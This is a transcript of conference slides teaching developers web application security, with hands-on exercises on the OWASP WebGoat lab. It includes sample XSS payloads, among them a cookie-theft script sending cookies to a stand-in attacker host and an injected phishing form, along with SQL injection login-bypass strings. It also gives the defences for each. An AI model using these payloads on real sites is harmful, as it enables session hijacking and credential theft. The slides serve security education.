Devbeat Conference - Developer First Security
-
Upload
michael-coates -
Category
Technology
-
view
8.178 -
download
3
description
Transcript of Devbeat Conference - Developer First Security
Developer-first security Integrating Security into
Development
Michael Coates !
[email protected] michael-coates.blogspot.com
@_mwc
About Me
Reality
“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”
h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
!
Data Loss & Breaches
Verizon Data Breach Report 2013datalossdb.org
Outside Attackers
Verizon Data Breach Report 2013datalossdb.org
Security - Into The Details• Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control
• Who’s Monitoring Your Traffic?— Encrypting in Transit
• Secure Data Storage & Protection — Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
WARNING
Security Testing is
ILLEGAL ON UNAUTHORIZED SYSTEMS
Cross Site Scripting SQL Injection Access Control
3 Dangerous Vulnerabilities
What are Web Requests
• Open console & enter the following: telnet google.com 80GET / HTTP/1.1
• Hit return 2 times
Cross Site Scripting (XSS)• Problem: User controlled data returned in HTTP
response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test: " ><script>alert(document.cookie)</script>
• Cookie Theft Example: "><script>document.location='http://attackersite/ '+document.cookie</script>
XSS Behind The Sceneshttp://shinypage.com?user=Bob
<div>Glad to see you <b>Bob</b></div>HTML Source
<h1>Glad to see you <%= request.getParameter("name") %></h1>JSP Code
Rendered HTML
XSS Behind The Scenes
http://shinypage.com?user=friend</b><br><form method=”post”
action=”badsite.com/login”> Login: <input type="text"
name="username"><br> Password:<input type="password"
name="password"><input type="submit" value="Submit" /></form>
XSS - Injecting HTML
Rendered HTML
Cross Site Scripting• Cross Site Scripting typically uses JavaScript to
do bad things
• Steal session cookies <script>alert(document.cookie)</script>
• Redirect to bad pages <script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
Lab! - Reflected XSS
Reflected XSS Lab• Lesson: Cross-Site Scripting->Reflected
XSS Attacks
• Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab• Lesson: Cross-Site Scripting-
>Stored XSS Attacks
• Proxy Not Needed
XSS Prevention• Solution
1. Output Encoding - converts command characters to benign characters for display 2. Input Validation
< > “ ‘ &
< >
"e; ' &HTML Encoding
<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>
XSS Attempt Revisited
http://shinypage.com?user=friend</b><br><form method=”post”
action=”badsite.com/login”> Login: <input type="text"
name="username"><br> Password:<input type="password"
name="password"><input type="submit" value="Submit" /></form>
Safe Handling
Glad to see you friend</b> <br><form method="post" action="badsite.com/
login"> Login: <input type="text" name="username"><br>
Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
Rendered HTML
XSS Resources
• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
• Content Security Policy - http://bit.ly/CSP-OWASP
• OWASP XSS Overview - http://bit.ly/OWASPXSS
SQL Injection• Problem: User controlled data improperly used with SQL
statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:OR 1=1 --' OR '1'= '1'--
• Example Vulnerable Query:sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
Lab! - SQL Lesson
SQL Injection• Lesson: Injection Flaws ->
Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
SQL Injection
• HTTP Postemployee_id=112&password=x' OR ‘1'='1 &action=Login
• Vulnerable SQLSelect user from UserTable where name= '+username+ ' and pass = '+password+ ‘
• Resulting StatementSelect user from UserTable where name= '112' and pass = 'x' OR '1'='1'
• Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
SQL Injection
• Parameterized QueriesNo confusion with control characters Example: would look for password of ‘ or ‘1’=’1
• Input Validation Are special characters needed for most fields?What about non-printable characters %00-%0A?
SQL Injection Resources
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Access Control• Problem: Developers assume some parts of app can’t be seen,
tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example:!
• http://somebadbank.com/showacct?id=101
• http://somebadbank.com/showacct?id=102
Lab! - Access Control
Access Control Violation• Lesson: Access Control Flaws-
>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
Access Control Violation• Hint: Login with Tom and perform available
actions (search staff, view profile). Figure out how action name is sent to server
POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost !employee_id=105&action=ViewProfile
Strong Access Controls• Access Control Performed Server Side
• Never Relies Upon “Security by Obscurity”
• Be Careful with Identifiers (e.g. id=123)
• Attacker Can Send Anything in Request
• Presentation Layer Controls Can Not Enforce Access Control
Access Control Resources
• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
Who’s Monitoring Your Traffic?
Insecure Session Management
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent cleartext <-- vulnerability point
https://site.com/login
http://site.com/profile
Vulnerable Redirects• User requests HTTP page, response redirects
HTTPS
• 302 Response is HTTP <-- Vulnerability Point
Secure Design for Communication
• Use HTTPS Throughout Web Site!
• HTTP Strict Transport Security (HSTS)!
• Opt-in security control
• Website instructs compatible browser to enable STS for site
• HSTS Forces (for enabled site):
• All communication over HTTPS
• No insecure HTTP requests sent from browser
• No option for user to override untrusted certificates
Strict Transport Security• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
Secure Data Storage & Protection
Password StorageBad Approaches!
• Your own algorithm
• md5
• sha1
• encryption
• base64 encoding
• rot 13
Good Approach!
• Bcrypt
• PBKDF2
+ Per User Salt
What Are We Protecting?Correct password hashing protects against:!
• Offline attacks of password repository
• Brute Force, Rainbow Attacks
!
!
!
Does not address:!
Guessing easy passwords
Password theft, disclosure
Session Hijacking
Credential Stuffing
Architecture for Sensitive Data
https://site.com internal SSL
web server database
Monitor Database Queries &
Response Size
Encrypting Sensitive Data in Database
databaseCustomer/Group Encryption Key
User Data
Key Encrypting Key
Encrypted [Customer/Group Encryption Key]
Decrypt
Encrypt
Encryption within Database Unique keys per data regionKey encrypting keys Hardware Security Modules (
Hardware Security Module
Growing Threats Plaguing Applications
Denial of ServiceDenial of Service (DOS)
Distributed Denial of Service (DDOS)
Denial of Service
Application Layer DDOSNetwork DDOS
site.com/generateReport
Exhaust Network!Bandwidth
Exhaust Server !CPU/Memory
Application Denial of Service
Traditional Network DDOS !
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS !
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
Credential Stuffing
compromised! server!
Stolen Credentials!joe: abc123!sue: password1!bob: MyP0n3y
joe: abc123
https://site.com/login!
sue:password1
Credentials!joe: abc123!sue: password1!bob: MyP0n3y
Take Aways• Understand top security threats and anticipate
potential malicious use of application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
Thanks!
http://michael-coates.blogspot.com
@_mwc
Virtual Security Training Lab Setup
Software
• Vulnerable Server: OWASP’s Webgoat
• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)
• Browser
• Virtual Machine: OWASP Broken Web App VM
Test Connectivity to VM1.Open Browser
2.Browse to your VM ip (listed in VM login page)
• e.g. http://192.168.56.101
3.Should see OWASP BWA welcome page
4.Error? Check ip address of VM
WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
Understanding the Proxy• Proxy is middle-man between browser and web
server
• Assists with traffic manipulation & inspection
Web Proxy Web ServerAttacker’s Browser
VMPrimary OS
Understanding the Proxy
Web Proxy Web ServerBrowser
Your Computer
Enabling Proxy
1.Open ZAP
2.Configure Firefox to use proxy
3.Resend Request
4.Confirm received by proxy
5.Forward to web server (vm)
Using A Proxy• ZAP - Configure to listen on 8080
Set Firefox Proxy• Set Firefox proxy to 8080
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy
• Important - clear “No Proxy for” line
Confirm Setup Works
• Refresh Web Browser
• Go to ZAP
• See site in left-hand column
Intercepting Traffic• Add a “breakpoint” by right clicking on the page and choosing
“Break...”
!
!
!
!
• Refresh the webpage - it will hang
• Modify the request as needed, then press the “Continue” button
“Hello World” of Proxies• Lesson: General->Http Basic
• Objective:
• Enter your name into text box
• Intercept with proxy & change entered name to different value
• Receive response & observe modified value is reversed
Web Proxy Web ServerAttacker’s Browser
Joe Sue
euSeuS